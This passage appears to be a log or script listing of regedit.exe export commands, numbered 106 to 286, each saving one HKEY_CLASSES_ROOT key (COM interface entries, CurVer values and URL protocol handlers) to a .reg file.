/e "106.reg" "HKEY_CLASSES_ROOT\Interface\{C100BEBD-D33A-4a4b-BF23-BBEF4663D017}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "107.reg" "HKEY_CLASSES_ROOT\Interface\{C093CB63-5EF5-4585-AF8E-4D5637487B57}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "108.reg" "HKEY_CLASSES_ROOT\Interface\{BAECB0BD-A946-4771-BC30-E8B24F8D45C1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "109.reg" "HKEY_CLASSES_ROOT\Interface\{B5DEF5A1-FFB6-4E68-B3D8-A12AC60FDA54}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "110.reg" "HKEY_CLASSES_ROOT\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "111.reg" "HKEY_CLASSES_ROOT\Interface\{BB13B3C3-AF9B-43DB-9DF8-B2F65AA5E21B}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "112.reg" "HKEY_CLASSES_ROOT\Interface\{BE39F3D4-1B13-11D0-887F-00A0C90F2744}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "113.reg" "HKEY_CLASSES_ROOT\Interface\{BC97469F-CB11-4037-8DCE-5FC9F5F85307}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "114.reg" "HKEY_CLASSES_ROOT\Interface\{BB13B3C3-AF9B-43DB-9DF8-B2F65AA5E21B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "115.reg" "HKEY_CLASSES_ROOT\Interface\{8D46C1B6-BBAB-450D-A61F-4DDC898B21D4}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "116.reg" "HKEY_CLASSES_ROOT\Interface\{5007373A-20D7-458F-9FFB-ABC900E3A831}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "117.reg" "HKEY_CLASSES_ROOT\Interface\{4FDC29A1-340B-45FB-90A3-2654D980BEFB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "118.reg" "HKEY_CLASSES_ROOT\Interface\{4CAC6328-B9B0-11D3-8D59-0050048384E3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "119.reg" "HKEY_CLASSES_ROOT\Interface\{5007373A-20D7-458F-9FFB-ABC900E3A831}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "120.reg" "HKEY_CLASSES_ROOT\Interface\{507171A9-0D7B-47CA-8DF5-56B23ACDC623}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "121.reg" "HKEY_CLASSES_ROOT\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "122.reg" "HKEY_CLASSES_ROOT\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "123.reg" "HKEY_CLASSES_ROOT\Interface\{476E2969-3B2B-4B3F-8277-CFF6056042AA}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "124.reg" "HKEY_CLASSES_ROOT\Interface\{46B89F5A-769D-4792-AD9A-E3755915CBC3}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "125.reg" "HKEY_CLASSES_ROOT\Interface\{46B89F5A-769D-4792-AD9A-E3755915CBC3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "126.reg" "HKEY_CLASSES_ROOT\Interface\{4815E0C3-F66C-4236-BD38-FE3810B54076}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "127.reg" "HKEY_CLASSES_ROOT\Interface\{4A894040-247E-4AFF-BB08-3489E9905235}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "128.reg" "HKEY_CLASSES_ROOT\Interface\{4A894040-247E-4AFF-BB08-3489E9905235}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "129.reg" "HKEY_CLASSES_ROOT\Interface\{49E0DBD1-9440-466C-9C97-95C67190C603}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "130.reg" "HKEY_CLASSES_ROOT\Interface\{5A577640-501D-4927-BCD0-5EF57A7ED175}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "131.reg" "HKEY_CLASSES_ROOT\Interface\{5852F5EC-8BF4-11D4-A245-0080C6F74284}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "132.reg" "HKEY_CLASSES_ROOT\Interface\{55F88896-7708-11D1-ACEB-006008961DA5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "133.reg" "HKEY_CLASSES_ROOT\Interface\{5AF314CF-8849-4A79-A3FC-8DE6625D9E72}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "134.reg" "HKEY_CLASSES_ROOT\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "135.reg" "HKEY_CLASSES_ROOT\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "136.reg" "HKEY_CLASSES_ROOT\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "137.reg" "HKEY_CLASSES_ROOT\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "138.reg" "HKEY_CLASSES_ROOT\Interface\{52027082-0B74-4648-9564-828CC6CB656C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "139.reg" "HKEY_CLASSES_ROOT\Interface\{507171A9-0D7B-47CA-8DF5-56B23ACDC623}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "140.reg" "HKEY_CLASSES_ROOT\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "141.reg" "HKEY_CLASSES_ROOT\Interface\{55F88892-7708-11D1-ACEB-006008961DA5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "142.reg" "HKEY_CLASSES_ROOT\Interface\{55F88890-7708-11D1-ACEB-006008961DA5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "143.reg" "HKEY_CLASSES_ROOT\Interface\{54613049-40BF-4035-9E70-0A9312C0188D}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "144.reg" "HKEY_CLASSES_ROOT\Interface\{46B89F5A-769D-4792-AD9A-E3755915CBC3}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "145.reg" "HKEY_CLASSES_ROOT\Interface\{39843BF4-C4D2-41FD-B4B2-AEDBEE5E1900}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "146.reg" "HKEY_CLASSES_ROOT\Interface\{39843BF3-C4D2-41FD-B4B2-AEDBEE5E1900}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "147.reg" "HKEY_CLASSES_ROOT\Interface\{39843BF2-C4D2-41FD-B4B2-AEDBEE5E1900}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "148.reg" "HKEY_CLASSES_ROOT\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "149.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D760-6018-11CF-9016-00AA0068841E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "150.reg" "HKEY_CLASSES_ROOT\Interface\{3B813CE7-7C10-4F84-AD06-9DF76D97A9AA}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "151.reg" "HKEY_CLASSES_ROOT\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "152.reg" "HKEY_CLASSES_ROOT\Interface\{36DE898D-AD48-40A5-B4B2-123F916BFBAB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "153.reg" "HKEY_CLASSES_ROOT\Interface\{36DE898D-AD48-40A5-B4B2-123F916BFBAB}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "154.reg" "HKEY_CLASSES_ROOT\Interface\{3580A828-07FE-4B94-AC1A-757D9D2D3056}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "155.reg" "HKEY_CLASSES_ROOT\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "156.reg" "HKEY_CLASSES_ROOT\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "157.reg" "HKEY_CLASSES_ROOT\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "158.reg" "HKEY_CLASSES_ROOT\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "159.reg" "HKEY_CLASSES_ROOT\Interface\{452AC71A-B655-4967-A208-A4CC39DD7949}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "160.reg" "HKEY_CLASSES_ROOT\Interface\{45046D60-08CA-11CF-A90F-00AA0062BB4C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "161.reg" "HKEY_CLASSES_ROOT\Interface\{45046D60-08CA-11CF-A90F-00AA0062BB4C}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "162.reg" "HKEY_CLASSES_ROOT\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "163.reg" "HKEY_CLASSES_ROOT\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "164.reg" "HKEY_CLASSES_ROOT\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "165.reg" "HKEY_CLASSES_ROOT\Interface\{465E787A-0556-452F-9477-954E4A940003}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "166.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D761-6018-11CF-9016-00AA0068841E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "167.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D761-6018-11CF-9016-00AA0068841E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "168.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D760-6018-11CF-9016-00AA0068841E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "169.reg" "HKEY_CLASSES_ROOT\Interface\{4291224C-DEFE-485B-8E69-6CF8AA85CB76}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "170.reg" "HKEY_CLASSES_ROOT\Interface\{4495AD01-C993-11D1-A3E4-00A0C90AEA82}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "171.reg" "HKEY_CLASSES_ROOT\Interface\{4495AD01-C993-11D1-A3E4-00A0C90AEA82}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "172.reg" "HKEY_CLASSES_ROOT\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "173.reg" "HKEY_CLASSES_ROOT\Interface\{81F9B44F-BA3A-4F5D-9B51-090C74A9B3A4}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "174.reg" "HKEY_CLASSES_ROOT\Interface\{81F9B44F-BA3A-4F5D-9B51-090C74A9B3A4}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "175.reg" "HKEY_CLASSES_ROOT\Interface\{7EDF9A92-4750-41A5-A17F-879A6F4F7DCB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "176.reg" "HKEY_CLASSES_ROOT\Interface\{8284B8A2-A8A8-11D1-A3D2-00A0C90AEA82}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "177.reg" "HKEY_CLASSES_ROOT\Interface\{83C49FF0-B294-11D0-9488-00A0C91110ED}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "178.reg" "HKEY_CLASSES_ROOT\Interface\{83C49FF0-B294-11D0-9488-00A0C91110ED}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "179.reg" "HKEY_CLASSES_ROOT\Interface\{8284B8A2-A8A8-11D1-A3D2-00A0C90AEA82}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "180.reg" "HKEY_CLASSES_ROOT\Interface\{7CD069A0-50AA-11D1-B8F0-00A0C9259304}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "181.reg" "HKEY_CLASSES_ROOT\Interface\{7C85BF5E-DC7C-4F61-839B-4107E1C9B68E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "182.reg" "HKEY_CLASSES_ROOT\Interface\{7AE2A4AD-F2F4-4BA7-98B1-67C96736CD5F}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "183.reg" "HKEY_CLASSES_ROOT\Interface\{7CD069A0-50AA-11D1-B8F0-00A0C9259304}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "184.reg" "HKEY_CLASSES_ROOT\Interface\{7EA23D88-569E-4EFD-9851-A1528A7745F9}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "185.reg" "HKEY_CLASSES_ROOT\Interface\{7EA23D88-569E-4EFD-9851-A1528A7745F9}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "186.reg" "HKEY_CLASSES_ROOT\Interface\{7D6B8796-D75D-4348-A445-6DDE811AF9AC}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "187.reg" "HKEY_CLASSES_ROOT\Interface\{8BF94B48-1E76-4AA3-AB1D-463F49B3E681}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "188.reg" "HKEY_CLASSES_ROOT\Interface\{8BF94B48-1E76-4AA3-AB1D-463F49B3E681}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "189.reg" "HKEY_CLASSES_ROOT\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "190.reg" "HKEY_CLASSES_ROOT\Interface\{8CD444E8-C9BB-49B3-8E38-E03209416131}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "191.reg" "HKEY_CLASSES_ROOT\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "192.reg" "HKEY_CLASSES_ROOT\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "193.reg" "HKEY_CLASSES_ROOT\Interface\{8D076AD6-9B6F-4150-A0FD-5D7E8C8CB02C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "194.reg" "HKEY_CLASSES_ROOT\Interface\{888A5A60-B283-11CF-8AD5-00A0C90AEA82}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "195.reg" "HKEY_CLASSES_ROOT\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "196.reg" "HKEY_CLASSES_ROOT\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "197.reg" "HKEY_CLASSES_ROOT\Interface\{888A5A60-B283-11CF-8AD5-00A0C90AEA82}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "198.reg" "HKEY_CLASSES_ROOT\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "199.reg" "HKEY_CLASSES_ROOT\Interface\{8A64A872-FC6B-4D4A-926E-3A3689562C1C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "200.reg" "HKEY_CLASSES_ROOT\Interface\{8A4A20C2-93F3-44E8-8644-BEB2E3487E84}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "201.reg" "HKEY_CLASSES_ROOT\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "202.reg" "HKEY_CLASSES_ROOT\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "203.reg" "HKEY_CLASSES_ROOT\Interface\{673E8454-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "204.reg" "HKEY_CLASSES_ROOT\Interface\{673E8454-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "205.reg" "HKEY_CLASSES_ROOT\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "206.reg" "HKEY_CLASSES_ROOT\Interface\{6D4B9C3E-CC05-493F-85E2-43D1006DF96A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "207.reg" "HKEY_CLASSES_ROOT\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "208.reg" "HKEY_CLASSES_ROOT\Interface\{68746729-F493-4830-A10F-69028774605D}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "209.reg" "HKEY_CLASSES_ROOT\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "210.reg" "HKEY_CLASSES_ROOT\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "211.reg" "HKEY_CLASSES_ROOT\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "212.reg" "HKEY_CLASSES_ROOT\Interface\{627EA7B4-95B5-4980-84C1-9D20DA4460B1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "213.reg" "HKEY_CLASSES_ROOT\Interface\{673E8452-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "214.reg" "HKEY_CLASSES_ROOT\Interface\{673E8452-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "215.reg" "HKEY_CLASSES_ROOT\Interface\{66BB2F51-5844-4997-8D70-4B7CC221CF92}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "216.reg" "HKEY_CLASSES_ROOT\Interface\{74C26041-70D1-11D1-B75A-00A0C90564FE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "217.reg" "HKEY_CLASSES_ROOT\Interface\{737361EC-467F-11D1-810F-0000F87557AA}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "218.reg" "HKEY_CLASSES_ROOT\Interface\{737361EC-467F-11D1-810F-0000F87557AA}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "219.reg" "HKEY_CLASSES_ROOT\Interface\{7500A6BA-EB65-11D1-938D-0000F87557C9}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "220.reg" "HKEY_CLASSES_ROOT\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "221.reg" "HKEY_CLASSES_ROOT\Interface\{796A2C2D-5B11-4FB5-9077-56D5E674972B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "222.reg" "HKEY_CLASSES_ROOT\Interface\{7500A6BA-EB65-11D1-938D-0000F87557C9}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "223.reg" "HKEY_CLASSES_ROOT\Interface\{6F81EA95-074E-48D4-AA96-62197E0AE96F}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "224.reg" "HKEY_CLASSES_ROOT\Interface\{6F81EA95-074E-48D4-AA96-62197E0AE96F}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "225.reg" "HKEY_CLASSES_ROOT\Interface\{6EA00553-9439-4D5A-B1E6-DC15A54DA8B2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "226.reg" "HKEY_CLASSES_ROOT\Interface\{70B31271-BC47-4EB8-8074-67D06378D691}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "227.reg" "HKEY_CLASSES_ROOT\Interface\{72B82A24-A598-4E87-895F-CDB23A49E9DC}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "228.reg" "HKEY_CLASSES_ROOT\Interface\{724C1646-E64B-4BBF-8EB4-D45E4FD580DA}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "229.reg" "HKEY_CLASSES_ROOT\Interface\{70B31271-BC47-4EB8-8074-67D06378D691}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "230.reg" "HKEY_CLASSES_ROOT\MSOLAP140ErrorLookup\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "231.reg" "HKEY_CLASSES_ROOT\MSOLAP130ErrorLookup\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "232.reg" "HKEY_CLASSES_ROOT\MSOLAP\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "233.reg" "HKEY_CLASSES_ROOT\MSOLAPUI140.ConnectDialog\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "234.reg" "HKEY_CLASSES_ROOT\MsoTDAddin.Connect\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "235.reg" "HKEY_CLASSES_ROOT\MsoPeopleDataHandler.PeopleDataProvider\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "236.reg" "HKEY_CLASSES_ROOT\MsoPeopleDataHandler.PeopleDataHandler\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "237.reg" "HKEY_CLASSES_ROOT\MSComctlLib.TabStrip\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "238.reg" "HKEY_CLASSES_ROOT\MSComctlLib.Slider\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "239.reg" "HKEY_CLASSES_ROOT\MSComctlLib.SBarCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "240.reg" "HKEY_CLASSES_ROOT\MSComctlLib.Toolbar\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "241.reg" "HKEY_CLASSES_ROOT\MsoEuro.Converter\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "242.reg" "HKEY_CLASSES_ROOT\MSDMine\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "243.reg" "HKEY_CLASSES_ROOT\MSComctlLib.TreeCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "244.reg" "HKEY_CLASSES_ROOT\Office.QueryConstraints\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "245.reg" "HKEY_CLASSES_ROOT\Office.Query\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "246.reg" "HKEY_CLASSES_ROOT\odc.tablecollection\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "247.reg" "HKEY_CLASSES_ROOT\Office.QueryConstraintsBuilder\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "248.reg" "HKEY_CLASSES_ROOT\Office.StorageServer\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "249.reg" "HKEY_CLASSES_ROOT\Office.Session\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "250.reg" "HKEY_CLASSES_ROOT\Office.Row\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "251.reg" "HKEY_CLASSES_ROOT\NotificationData"

C:\Windows\SysWOW64\regedit.exe

/e "252.reg" "HKEY_CLASSES_ROOT\mswindowsvideo"

C:\Windows\SysWOW64\regedit.exe

/e "253.reg" "HKEY_CLASSES_ROOT\mswindowsmusic"

C:\Windows\SysWOW64\regedit.exe

/e "254.reg" "HKEY_CLASSES_ROOT\odc.cube\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "255.reg" "HKEY_CLASSES_ROOT\odc.table\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "256.reg" "HKEY_CLASSES_ROOT\odc.new\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "257.reg" "HKEY_CLASSES_ROOT\odc.database\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "258.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ProgCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "259.reg" "HKEY_CLASSES_ROOT\LR.LexRefEnglishStemmer.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "260.reg" "HKEY_CLASSES_ROOT\LR.LexRefBilingualTextContext.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "261.reg" "HKEY_CLASSES_ROOT\LR.LexRefBilingualServiceAttribute.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "262.reg" "HKEY_CLASSES_ROOT\LR.LexRefServiceContainer.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "263.reg" "HKEY_CLASSES_ROOT\LR.LexRefStFrObject.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "264.reg" "HKEY_CLASSES_ROOT\LR.LexRefStEsObject.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "265.reg" "HKEY_CLASSES_ROOT\LR.LexRefServiceManager.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "266.reg" "HKEY_CLASSES_ROOT\ImeCommonAPIClassFactory1042\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "267.reg" "HKEY_CLASSES_ROOT\ImeCommonAPIClassFactory1028\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "268.reg" "HKEY_CLASSES_ROOT\ImeCommonAPI1042\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "269.reg" "HKEY_CLASSES_ROOT\ImeKeyEventHandler1042\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "270.reg" "HKEY_CLASSES_ROOT\LR.LexRefBilingualService.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "271.reg" "HKEY_CLASSES_ROOT\imkrhjd.hanjadic\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "272.reg" "HKEY_CLASSES_ROOT\IMEPad.SKF.TCIME\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "273.reg" "HKEY_CLASSES_ROOT\MOFL.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "274.reg" "HKEY_CLASSES_ROOT\Microsoft.Workfolders\DefaultIcon"

C:\Windows\SysWOW64\regedit.exe

/e "275.reg" "HKEY_CLASSES_ROOT\Microsoft.TEC\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "276.reg" "HKEY_CLASSES_ROOT\ms-xbl-3d8b930f"

C:\Windows\SysWOW64\regedit.exe

/e "277.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ListViewCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "278.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ImageListCtrl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "279.reg" "HKEY_CLASSES_ROOT\MSComctlLib.ImageComboCtl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "280.reg" "HKEY_CLASSES_ROOT\mailto"

C:\Windows\SysWOW64\regedit.exe

/e "281.reg" "HKEY_CLASSES_ROOT\LR.LexRefXml2RTFObject.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "282.reg" "HKEY_CLASSES_ROOT\LR.LexRefTfFunctionProvider.1.0\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "283.reg" "HKEY_CLASSES_ROOT\microsoft-edge"

C:\Windows\SysWOW64\regedit.exe

/e "284.reg" "HKEY_CLASSES_ROOT\Microsoft.OsfMui.InstallerMainShell\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "285.reg" "HKEY_CLASSES_ROOT\Microsoft.MsoASB.RemoterTrusted\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "286.reg" "HKEY_CLASSES_ROOT\microsoft-edge-holographic"

C:\Windows\SysWOW64\regedit.exe

